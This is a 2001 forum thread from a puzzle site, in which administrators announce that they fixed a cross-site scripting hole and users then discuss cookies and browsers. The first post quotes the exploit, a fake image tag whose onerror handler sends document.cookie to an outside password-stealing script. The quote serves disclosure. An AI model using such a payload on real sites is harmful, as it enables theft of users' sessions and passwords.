The Grey Labyrinth is a collection of puzzles, riddles, mind games, paradoxes and other intellectually challenging diversions. Related topics: puzzle games, logic puzzles, lateral thinking puzzles, philosophy, mind benders, brain teasers, word problems, conundrums, 3d puzzles, spatial reasoning, intelligence tests, mathematical diversions, paradoxes, physics problems, reasoning, math, science.

   
The Grey Labyrinth Forum Index
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups    RegisterRegister  
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

Haxors... in the GL???

 
Reply to topic    The Grey Labyrinth Forum Index -> Grey Labyrinth News
View previous topic :: View next topic  
Author Message
HyToFry
Drama queen



PostPosted: Mon Dec 17, 2001 11:02 pm    Post subject: 1 Reply with quote

With the help of justin, I've found, and eliminated a security hole that was on the GL.

Using a fake img tag that looked like this,
quote:

[img]fake"onerror="this.src='http://www.hytofry.com/scripts/passwordstealer.cgi?passwords=(document.cookie)';"[/img]


the haxor could steal your password as soon as you opened the thread. (assuming you're using a browser that stores cookies).

The problem has been taken care of.

I don't think any passwords got leaked, but if you're an admin/mod... now might be the time to change your password. (I did, but I do monthly anyway)
Back to top
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger
justindl
Daedalian Member



PostPosted: Mon Dec 17, 2001 11:05 pm    Post subject: 2 Reply with quote

i didn't steal anyone's but my own about 5000 times Razz
Back to top
View user's profile Send private message Send e-mail Visit poster's website
NightOwl
Daedalian Member



PostPosted: Mon Dec 17, 2001 11:05 pm    Post subject: 3 Reply with quote

Funny you should mention that cookie saving passwords thing... for the past three months my browser can't remember the GL's password. I thought you turned it off.
Back to top
View user's profile Send private message Send e-mail Visit poster's website
justindl
Daedalian Member



PostPosted: Mon Dec 17, 2001 11:09 pm    Post subject: 4 Reply with quote

go to preferences... it'll only do it for a year..... (this cookies thing works if you have cookies enabled at all)
Back to top
View user's profile Send private message Send e-mail Visit poster's website
Moose
Liberty Chick



PostPosted: Mon Dec 17, 2001 11:14 pm    Post subject: 5 Reply with quote

YAY HY AND JUSTIN!!!
::hugs them both::
Back to top
View user's profile Send private message
Sofis
Beautiful and Decadent



PostPosted: Tue Dec 18, 2001 3:31 am    Post subject: 6 Reply with quote

Hy, I found an odd bug: when I change my password, I am no longer allowed into the GLOC forum, but I can still get into Private Games. Changing the password back to what it was restores my ability to get into GLOC.
Back to top
View user's profile Send private message
Quailman
His Postmajesty



PostPosted: Tue Dec 18, 2001 1:07 pm    Post subject: 7 Reply with quote

HAHAHAHAHAHAHA!!!! I am the haxor! Unfortunately you closed the leak when I only had one password and it turned out to belong to some dickhead.
Back to top
View user's profile Send private message Send e-mail
Marvin
Pseudo-Yank



PostPosted: Tue Dec 18, 2001 2:12 pm    Post subject: 8 Reply with quote

I hope that was Quailman.
Back to top
View user's profile Send private message Send e-mail Yahoo Messenger MSN Messenger
HyToFry
Drama queen



PostPosted: Tue Dec 18, 2001 4:02 pm    Post subject: 9 Reply with quote

Witt like that? Had to be our Quailman.

Sofis... this isn't really a bug, but a cookie problem.

If you close your IE window, open a new one (from the desktop... File->New Window won't work) then it will ask you to log in again.


(I think.)

Or, you can go to preferences, and have the site delete all cookies, and then log in.


Hope this helps.
Back to top
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger
Sofis
Beautiful and Decadent



PostPosted: Tue Dec 18, 2001 5:13 pm    Post subject: 10 Reply with quote

If it's a cookie problem, why would it affect only GLOC? I could get into Private Games just fine and the cookies were placing the new password into the password box. I'll try it though.

(Oh, and for the record, I use Opera, not IE.)
Back to top
View user's profile Send private message
Sofis
Beautiful and Decadent



PostPosted: Tue Dec 18, 2001 5:17 pm    Post subject: 11 Reply with quote

Okay, it works.
Back to top
View user's profile Send private message
Lepton
1:41+ Arse Scratcher



PostPosted: Wed Dec 19, 2001 1:08 am    Post subject: 12 Reply with quote

Opera has many problems. I'm surprised you've found a solution that doesn't involve blaming the bad program.
Back to top
View user's profile Send private message Send e-mail AIM Address
HyToFry
Drama queen



PostPosted: Wed Dec 19, 2001 4:25 pm    Post subject: 13 Reply with quote

I think Opera is one of the best.

It's Nutscrape that sux. (I haven't tried 6.0, but I have heard from a reliable source that it's pretty good too.)
Back to top
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger
Chuck
Daedalian Member



PostPosted: Wed Dec 19, 2001 5:09 pm    Post subject: 14 Reply with quote

I tried Opera. It wouldn't run Java and kept locking up my computer. Maybe other have had better luck with it.
Back to top
View user's profile Send private message Send e-mail Visit poster's website AIM Address
justindl
Daedalian Member



PostPosted: Thu Dec 20, 2001 10:36 pm    Post subject: 15 Reply with quote

opera 6 has java. im going to get it as soon as it comes out for linux Ecstatic Happiness. opera rocks... it really REALLY does. ALOT
Back to top
View user's profile Send private message Send e-mail Visit poster's website
HyToFry
Drama queen



PostPosted: Thu Dec 20, 2001 10:38 pm    Post subject: 16 Reply with quote

I'll agree with that.
Back to top
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger
Macros
Daedalian Member



PostPosted: Sat Dec 22, 2001 11:52 pm    Post subject: 17 Reply with quote

lol, seeing that topic title made me think i think for no reason at all, jeffk should get the title of "h4x0ring fux0r"
sorry =P
Back to top
View user's profile Send private message Send e-mail
extropalopakettle
No offense, but....



PostPosted: Sun Dec 23, 2001 2:27 am    Post subject: 18 Reply with quote

Most (all? some?) browsers allow you to set an option (possibly the default setting) so that cookies on your machine can only be examined by the site that put them there (generally a good idea, if you're accepting cookies at all). Would setting that option have prevented the above exploit from working? Unless, of course, the cookie password stealer was operating from the GL.
Back to top
View user's profile Send private message
HyToFry
Drama queen



PostPosted: Wed Dec 26, 2001 7:13 pm    Post subject: 19 Reply with quote

It was activated from the GL, on the GL's web page. The image was actually setting it's src to be "something.com/thisscript.cgi?yourusernameandpasswordinfohere" The browser allowed it because it was comming from this page.

The only way you could have prevented it was to not allow java to access cookies, and I don't think that's possible, and even if it was, ubb wouldn't be able to save your password if you used it.
Back to top
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger
hucking fax0r
Guest



PostPosted: Fri Mar 15, 2002 2:13 am    Post subject: 20 Reply with quote

HAHAHAHAHAhAHAHAHAHAHAHAHAHA!!!!!!11111
Back to top
justindl
Daedalian Member



PostPosted: Sat Mar 16, 2002 8:06 pm    Post subject: 21 Reply with quote

woohoo i just had a new idea, off to check it
Back to top
View user's profile Send private message Send e-mail Visit poster's website
Chuck
Daedalian Member



PostPosted: Sat Mar 16, 2002 9:03 pm    Post subject: 22 Reply with quote

Let's all just email our passwords to Justin so he can relax.
Back to top
View user's profile Send private message Send e-mail Visit poster's website AIM Address
Display posts from previous: by   
Reply to topic    The Grey Labyrinth Forum Index -> Grey Labyrinth News All times are GMT
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2005 phpBB Group
Site Design by Wx3